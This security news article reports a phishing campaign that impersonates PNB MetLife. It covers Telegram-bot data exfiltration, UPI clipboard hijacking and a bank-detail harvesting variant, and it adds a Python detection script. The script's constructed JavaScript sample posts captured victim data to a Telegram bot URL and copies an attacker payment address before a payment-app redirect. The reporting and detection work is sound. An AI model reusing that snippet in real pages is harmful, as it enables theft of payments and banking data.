A new, highly aggressive phishing campaign has been uncovered targeting policyholders of PNB MetLife Insurance, blending mobile-first design with stealthy data exfiltration tactics. Security researcher Anurag Gawande has detailed a sprawling operation in which scammers impersonate the trusted insurer to harvest sensitive personal data and banking credentials and to facilitate fraudulent UPI payments.
The campaign is notable not just for its visual fidelity but for its backend mechanics, which completely bypass traditional command-and-control (C2) servers in favor of the Telegram Bot API for real-time data theft.
The attack likely begins with a “smishing” (SMS phishing) lure, directing victims to fraudulent payment gateways optimized specifically for smartphones.
“The pages are optimized for mobile devices, both in layout and interaction design,” the report notes. “This strongly suggests that victims are likely being lured via SMS messages, although delivery via email, social media platforms, or messaging apps cannot be ruled out.”
The landing pages are designed to lower inhibitions by exploiting brand familiarity. “This activity highlights how scammers deliberately target reputed and widely trusted brands to exploit existing customer trust and increase the likelihood of successful financial fraud.”
However, the facade is thin. Technical analysis reveals that the sites perform zero validation on user input. “Any arbitrary values are accepted, and the user is allowed to proceed to the next step without verification,” exposing the site’s sole purpose: harvesting data, not processing legitimate premiums.
Instead of storing stolen data on a compromised server, the attackers are using Telegram bots as a live feed of victim information. Hardcoded directly into the malicious JavaScript are tokens for bots such as pnbmetlifesbot and goldenxspy_bot.
“Instead of communicating with a legitimate payment backend, the page sends captured information directly to Telegram, where it can be monitored in real time by the attacker.”
The report identifies specific operator accounts, including darkdevil_pnb and prabhatspy, receiving the stolen data streams.
One of the most devious techniques identified in the report is the manipulation of the victim’s device clipboard to force payments to the attacker.
After a victim enters a fake premium amount, the site generates a UPI QR code. Crucially, the site also includes buttons for popular apps like PhonePe and Paytm. “Clicking these buttons triggers JavaScript that silently copies the attacker-controlled UPI ID to the clipboard and then redirects the victim to a payment app deep link.”
This ensures that even if the QR code scan fails, the victim is primed to paste the attacker’s VPA (Virtual Payment Address) into their payment app, unknowingly sending funds to the fraudsters.
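The two traits described above, Telegram Bot API calls standing in for a C2 server and a clipboard write followed by a payment-app deep link, are distinctive enough to triage statically. The following is an added example written for this article, not code from the report or from the phishing kit: simple regex rules run over JavaScript sources, with constructed samples (placeholder bot token and VPA) and an assumed list of common UPI app schemes and VPA handles.

```python
import re

# Added example (not from the report): static triage rules for the traits described above.
# Sample scripts below are constructed for the test; the bot token and VPA are placeholders.
TELEGRAM_BOT_API = re.compile(
    r"api\.telegram\.org/bot(\d+):[A-Za-z0-9_-]+/(?:sendMessage|sendDocument|sendPhoto)")
CLIPBOARD_WRITE = re.compile(
    r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)")
# UPI app deep-link schemes; the list is an assumption covering common apps, not exhaustive.
UPI_DEEP_LINK = re.compile(r"\b(?:upi|phonepe|paytmmp|tez|gpay)://", re.IGNORECASE)
# Virtual Payment Address literals ending in a few common handles (assumed list).
UPI_VPA = re.compile(r"['\"]([a-z0-9._-]+@(?:ybl|paytm|okaxis|oksbi|okicici|upi|axl|ibl))['\"]",
                     re.IGNORECASE)


def scan_script(source: str) -> dict:
    """Return indicators found in one JavaScript source (bot ids only, never the secret)."""
    return {
        "telegram_bot_ids": [m.group(1) for m in TELEGRAM_BOT_API.finditer(source)],
        "clipboard_write": CLIPBOARD_WRITE.search(source) is not None,
        "upi_deep_link": UPI_DEEP_LINK.search(source) is not None,
        "vpa_literals": UPI_VPA.findall(source),
    }


def verdict(findings: dict) -> str:
    """Combine indicators: Telegram exfil plus a payment-redirect trait is the kit's signature."""
    payment_trait = bool(findings["clipboard_write"] or findings["upi_deep_link"]
                         or findings["vpa_literals"])
    if findings["telegram_bot_ids"] and payment_trait:
        return "likely-phishing-kit"
    if findings["telegram_bot_ids"] or (findings["clipboard_write"] and findings["upi_deep_link"]):
        return "suspicious"
    return "no-indicators"


# Constructed sample resembling the described kit (placeholder token and VPA).
SAMPLE_KIT = '''
fetch("https://api.telegram.org/bot123456789:PLACEHOLDER_token-value/sendMessage",
      {method: "POST", body: JSON.stringify({chat_id: CHAT_ID, text: captured})});
function payWith(app) {
  navigator.clipboard.writeText("placeholder-vpa@ybl");
  location.href = "phonepe://pay";
}
'''
# Constructed benign checkout script: talks to its own backend, no clipboard or deep links.
SAMPLE_BENIGN = '''
fetch("/api/premium/pay", {method: "POST", body: JSON.stringify(form)})
  .then(r => r.json()).then(showReceipt);
'''

if __name__ == "__main__":
    for name, src in (("kit", SAMPLE_KIT), ("benign", SAMPLE_BENIGN)):
        print(name, verdict(scan_script(src)))
```

Because the report notes that the URLs rotate while the logic stays identical, rules keyed on the script body rather than the hosting domain keep matching across redeployments.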
While the primary template focuses on immediate payment fraud, a second, more dangerous variant was observed. This version lures victims with promises of “Refunds” or “AutoDebit” setups to steal complete banking profiles.
“This second template follows a slightly different flow and is significantly more dangerous, as it escalates from payment fraud to full banking and card data theft.”
Victims are presented with a “Bank Details for Verification” page, where their account numbers and card details are captured and immediately beamed to the attackers via the goldenxspy_bot.
The campaign is built for speed and resilience. The phishing pages are hosted on EdgeOne Pages, a free hosting provider, allowing the attackers to spin up new sites instantly if one is taken down.
“This allows attackers to deploy and rotate phishing pages rapidly with minimal effort,” the report concludes, noting that while the URLs change, the underlying malicious logic remains identical.